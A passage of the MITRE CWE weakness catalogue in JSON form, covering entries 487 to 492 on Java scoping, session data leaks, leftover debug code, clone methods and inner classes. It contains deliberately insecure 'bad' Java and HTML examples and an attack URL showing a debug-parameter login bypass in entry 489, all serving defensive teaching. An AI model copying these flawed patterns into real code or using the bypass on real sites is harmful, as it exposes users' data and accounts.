ease-of-software-development feature but not a security feature.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Any data in a Java package can be accessed outside of the Java framework if the package is distributed."},{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The data in a Java class can be modified by anyone outside of the Java framework if the packages is distributed."}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Data should be private static and final whenever possible. This will assure that your code is protected by instantiating early, preventing access and tampering."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"package math;public class Lebesgue implements Integration{}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public final Static String youAreHidingThisFunction(functionToIntegrate){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return ...;","xhtml:br":""}}}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Relying on package-level scope"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET04-J","Entry_Name":"Do not increase the accessibility of overridden or hidden methods"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Type"}],"Previous_Entry_Name":{"#text":"Relying on Package-level Scope","attr":{"@_Date":"2008-04-11"}}}},"488":{"attr":{"@_ID":"488","@_Name":"Exposure of Data Element to Wrong Session","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not sufficiently enforce boundaries between the states of different sessions, causing data to be provided to, or used by, the wrong session.","Extended_Description":{"xhtml:p":["Data can \\"bleed\\" from one session to another through member variables of singleton objects, such as Servlets, and objects from a shared pool.","In the case of Servlets, developers sometimes do not understand that, unless a Servlet implements the SingleThreadModel interface, the Servlet is a singleton; there is only one instance of the Servlet, and that single instance is used and re-used to handle multiple requests that are processed simultaneously by different threads. A common result is that developers use Servlet member fields in such a way that one user may inadvertently see another user\'s data. In other words, storing user data in Servlet member fields introduces a data access race condition."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Protect the application\'s sessions from information leakage. Make sure that a session\'s data is not used or visible by other sessions."},{"Phase":"Testing","Description":"Use a static analysis tool to scan the code for information leakage vulnerabilities (e.g. Singleton Member Field)."},{"Phase":"Architecture and Design","Description":"In a multithreading environment, storing user data in Servlet member fields introduces a data access race condition. Do not use member fields to store information in the Servlet."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following Servlet stores the value of a request parameter in a member field and then later echoes the parameter value to the response output stream.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class GuestBook extends HttpServlet {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String name;protected void doPost (HttpServletRequest req, HttpServletResponse res) {}","xhtml:br":["",""],"xhtml:div":{"#text":"name = req.getParameter(\\"name\\");...out.println(name + \\", thanks for visiting!\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}},"Body_Text":"While this code will work perfectly in a single-user environment, if two users access the Servlet at approximately the same time, it is possible for the two request handler threads to interleave in the following way: Thread 1: assign \\"Dick\\" to name Thread 2: assign \\"Jane\\" to name Thread 1: print \\"Jane, thanks for visiting!\\" Thread 2: print \\"Jane, thanks for visiting!\\" Thereby showing the first user the second user\'s name."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Data Leaking Between Users"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Data Leaking Between Users","attr":{"@_Date":"2008-04-11"}},{"#text":"Data Leak Between Sessions","attr":{"@_Date":"2011-03-29"}}]}},"489":{"attr":{"@_ID":"489","@_Name":"Active Debug Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application is deployed to unauthorized actors with debugging code still enabled or active, which can create unintended entry points or expose sensitive information.","Extended_Description":"A common development practice is to add \\"back door\\" code specifically designed for debugging or testing purposes that is not intended to be shipped or deployed with the application. These back door entry points create security risks because they are not considered during design or testing and fall outside of the expected operating conditions of the application.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"215","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Leftover debug code","Description":"This term originates from Seven Pernicious Kingdoms"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"In web-based applications, debug code is used to test and modify web application properties, configuration information, and functions. If a debug application is left on a production server, this oversight during the \\"software process\\" allows attackers access to debug functionality."},{"Phase":"Build and Compilation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Other"],"Impact":["Bypass Protection Mechanism","Read Application Data","Gain Privileges or Assume Identity","Varies by Context"],"Note":"The severity of the exposed debug application will depend on the particular instance. At the least, it will give an attacker sensitive information about the settings and mechanics of web applications on the server. At worst, as is often the case, the debug application will allow an attacker complete control over the web application and server, as well as confidential information that either of these access."}},"Potential_Mitigations":{"Mitigation":{"Phase":["Build and Compilation","Distribution"],"Description":"Remove debug code before deploying the application."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Debug code can be used to bypass authentication. For example, suppose an application has a login script that receives a username and a password. Assume also that a third, optional, parameter, called \\"debug\\", is interpreted by the script as requesting a switch to debug mode, and that when this parameter is given the username and password are not checked. In such a case, it is very simple to bypass the authentication process if the special behavior of the application regarding the debug parameter is known. In a case where the form is:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":{"#text":"<FORM ACTION=\\"/authenticate_login.cgi\\"></FORM>","xhtml:div":{"#text":"<INPUT TYPE=TEXT name=username><INPUT TYPE=PASSWORD name=password><INPUT TYPE=SUBMIT>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"informative"},"xhtml:div":"http://TARGET/authenticate_login.cgi?username=...&password=..."},{"attr":{"@_Nature":"attack"},"xhtml:div":"http://TARGET/authenticate_login.cgi?username=&password=&debug=1"}],"Body_Text":["Then a conforming link will look like:","An attacker can change this to:","Which will grant the attacker access to the site, bypassing the authentication process."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Leftover Debug Code"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"121"}},{"attr":{"@_CAPEC_ID":"661"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"In J2EE a main method may be a good indicator that debug code has been left in the application, although there may not be any direct security impact.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Modes_of_Introduction, Other_Notes, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Alternate_Terms"}],"Previous_Entry_Name":{"#text":"Leftover Debug Code","attr":{"@_Date":"2020-02-24"}}}},"491":{"attr":{"@_ID":"491","@_Name":"Public cloneable() Method Without Final (\'Object Hijack\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A class has a cloneable() method that is not declared final, which allows an object to be created without calling the constructor. This can cause the object to be in an unexpected state.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Make the cloneable() method final."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In this example, a public class \\"BankAccount\\" implements the cloneable() method which declares \\"Object clone(string accountnumber)\\":","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount implements Cloneable{}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object clone(String accountnumber) throwsCloneNotSupportedException{}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Object returnMe = new BankAccount(account number);...","xhtml:br":["",""]}}}}}}},{"Intro_Text":"In the example below, a clone() method is defined without being declared final.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"protected Object clone() throws CloneNotSupportedException {}","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Mobile Code: Object Hijack"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ07-J","Entry_Name":"Sensitive classes must not let themselves be copied"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-453"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":[{"#text":"Mobile Code: Object Hijack","attr":{"@_Date":"2008-04-11"}},{"#text":"Public cloneable() Method Without Final (aka \'Object Hijack\')","attr":{"@_Date":"2009-05-27"}}]}},"492":{"attr":{"@_ID":"492","@_Name":"Use of Inner Class Containing Sensitive Data","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Inner classes are translated into classes that are accessible at package scope and may expose code that the programmer intended to keep private to attackers.","Extended_Description":"Inner classes quietly introduce several security concerns because of the way they are translated into Java bytecode. In Java source code, it appears that an inner class can be declared to be accessible only by the enclosing class, but Java bytecode has no concept of an inner class, so the compiler must transform an inner class declaration into a peer class with package level access to the original outer class. More insidiously, since an inner class can access private fields in its enclosing class, once an inner class becomes a peer class in bytecode, the compiler converts private fields accessed by the inner class into protected fields.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"\\"Inner Classes\\" data confidentiality aspects can often be overcome."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Using sealed classes protects object-oriented encapsulation paradigms and therefore protects code from being extended in unforeseen ways."},{"Phase":"Implementation","Description":"Inner Classes do not provide security. Warning: Never reduce the security of the object from an outer class, going to an inner class. If an outer class is final or private, ensure that its inner class is private as well."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following Java Applet code mistakenly makes use of an inner class.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public final class urlTool extends Applet {}","xhtml:div":{"#text":"private final class urlHelper {}...","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}}}},{"Intro_Text":"The following example shows a basic use of inner classes. The class OuterClass contains the private member inner class InnerClass. The private inner class InnerClass includes the method concat that accesses the private member variables of the class OuterClass to output the value of one of the private member variables of the class OuterClass and returns a string that is a concatenation of one of the private member variables of the class OuterClass, the separator input parameter of the method and the private member variable of the class InnerClass.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class OuterClass {}","xhtml:div":{"#text":"private String memberOne;private String memberTwo;public OuterClass(String varOne, String varTwo) {}private class InnerClass {}","attr":{"@_style":"margin-left:10px;"},"xhtml:i":["// private member variables of OuterClass","// constructor of OuterClass","// InnerClass is a member inner class of OuterClass"],"xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"this.memberOne = varOne;this.memberTwo = varTwo;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"private String innerMemberOne;public InnerClass(String innerVarOne) {}public String concat(String separator) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"this.innerMemberOne = innerVarOne;","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.out.println(\\"Value of memberOne is: \\" + memberOne);return OuterClass.this.memberTwo + separator + this.innerMemberOne;","attr":{"@_style":"margin-left:10px;"},"xhtml:i":"// InnerClass has access to private member variables of OuterClass","xhtml:br":["",""]}]}]}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class OuterClass {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String memberOne;private static String memberTwo;public OuterClass(String varOne, String varTwo) {}private static class InnerClass {}","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// private member variables of OuterClass","// constructor of OuterClass","// InnerClass is a static inner class of OuterClass"],"xhtml:div":[{"#text":"this.memberOne = varOne;this.memberTwo = varTwo;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String innerMemberOne;public InnerClass(String innerVarOne) {}public String concat(String separator) {}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"this.innerMemberOne = innerVarOne;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return memberTwo + separator + this.innerMemberOne;","xhtml:br":["",""],"xhtml:i":"// InnerClass only has access to static member variables of OuterClass"}}]}}]}}}}],"Body_Text":["Although this is an acceptable use of inner classes it demonstrates one of the weaknesses of inner classes that inner classes have complete access to all member variables and methods of the enclosing class even those that are declared private and protected. When inner classes are compiled and translated into Java bytecode the JVM treats the inner class as a peer class with package level access to the enclosing class.","To avoid this weakness of inner classes, consider using either static inner classes, local inner classes, or anonymous inner classes.","The following Java example demonstrates the use of static inner classes using the previous example. The inner class InnerClass is declared using the static modifier that signifies that InnerClass is a static member of the enclosing class OuterClass. By declaring an inner class as a static member of the enclosing class, the inner class can only access other static members and methods of the enclosing class and prevents the inner class from accessing nonstatic member variables and methods of the enclosing class. In this case the inner class InnerClass can only access the static member variable memberTwo of the enclosing class OuterClass but cannot access the nonstatic member variable memberOne.","The only limitation with using a static inner class is that as a static member of the enclosing class the inner class does not have a reference to instances of the enclosing class. For many situations this may not be ideal. An alternative is to use a local inner class or an anonymous inner class as shown in the next examples."]},{"Intro_Text":"In the following example the BankAccount class contains the private member inner class InterestAdder that adds interest to the bank account balance. The start method of the BankAccount class creates an object of the inner class InterestAdder, the InterestAdder inner class implements the ActionListener interface with the method actionPerformed. A Timer object created within the start method of the BankAccount class invokes the actionPerformed method of the InterestAdder class every 30 days to add the interest to the bank account balance based on the interest rate passed to the start method as an input parameter. The inner class InterestAdder needs access to the private member variable balance of the BankAccount class in order to add the interest to the bank account balance.","Body_Text":["However as demonstrated in the previous example, because InterestAdder is a non-static member inner class of the BankAccount class, InterestAdder also has access to the private member variables of the BankAccount class - including the sensitive data contained in the private member variables for the bank account owner\'s name, Social Security number, and the bank account number.","In the following example the InterestAdder class from the above example is declared locally within the start method of the BankAccount class. As a local inner class InterestAdder has its scope restricted to the method (or enclosing block) where it is declared, in this case only the start method has access to the inner class InterestAdder, no other classes including the enclosing class has knowledge of the inner class outside of the start method. This allows the inner class to access private member variables of the enclosing class but only within the scope of the enclosing method or block.","A similar approach would be to use an anonymous inner class as demonstrated in the next example. An anonymous inner class is declared without a name and creates only a single instance of the inner class object. As in the previous example the anonymous inner class has its scope restricted to the start method of the BankAccount class."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String accountOwnerName;private String accountOwnerSSN;private int accountNumber;private double balance;public BankAccount(String accountOwnerName, String accountOwnerSSN,int accountNumber, double initialBalance, int initialRate){}public void start(double rate){}private class InterestAdder implements ActionListener{}","xhtml:br":["","","","","","","","","","","","","","","","","","","","","",""],"xhtml:i":["// private member variables of BankAccount class","// constructor for BankAccount class","// start method will add interest to balance every 30 days","// creates timer object and interest adding action listener object","// InterestAdder is an inner class of BankAccount class","// that implements the ActionListener interface"],"xhtml:div":[{"#text":"this.accountOwnerName = accountOwnerName;this.accountOwnerSSN = accountOwnerSSN;this.accountNumber = accountNumber;this.balance = initialBalance;this.start(initialRate);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"#text":"ActionListener adder = new InterestAdder(rate);Timer t = new Timer(1000 * 3600 * 24 * 30, adder);t.start();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private double rate;public InterestAdder(double aRate){}public void actionPerformed(ActionEvent event){}","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"this.rate = aRate;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double interest = BankAccount.this.balance * rate / 100;BankAccount.this.balance += interest;","xhtml:br":["","",""],"xhtml:i":"// update interest"}}]}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String accountOwnerName;private String accountOwnerSSN;private int accountNumber;private double balance;public BankAccount(String accountOwnerName, String accountOwnerSSN,int accountNumber, double initialBalance, int initialRate){}public void start(final double rate){}","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:i":["// private member variables of BankAccount class","// constructor for BankAccount class","// start method will add interest to balance every 30 days","// creates timer object and interest adding action listener object"],"xhtml:div":[{"#text":"this.accountOwnerName = accountOwnerName;this.accountOwnerSSN = accountOwnerSSN;this.accountNumber = accountNumber;this.balance = initialBalance;this.start(initialRate);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"class InterestAdder implements ActionListener{}ActionListener adder = new InterestAdder();Timer t = new Timer(1000 * 3600 * 24 * 30, adder);t.start();","xhtml:br":["","","","","","","",""],"xhtml:i":["// InterestAdder is a local inner class","// that implements the ActionListener interface"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public void actionPerformed(ActionEvent event){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double interest = BankAccount.this.balance * rate / 100;BankAccount.this.balance += interest;","xhtml:br":["","",""],"xhtml:i":"// update interest"}}}}}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String accountOwnerName;private String accountOwnerSSN;private int accountNumber;private double balance;public BankAccount(String accountOwnerName, String accountOwnerSSN,int accountNumber, double initialBalance, int initialRate){}public void start(final double rate){}","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:i":["// private member variables of BankAccount class","// constructor for BankAccount class","// start method will add interest to balance every 30 days","// creates timer object and interest adding action listener object"],"xhtml:div":[{"#text":"this.accountOwnerName = accountOwnerName;this.accountOwnerSSN = accountOwnerSSN;this.accountNumber = accountNumber;this.balance = 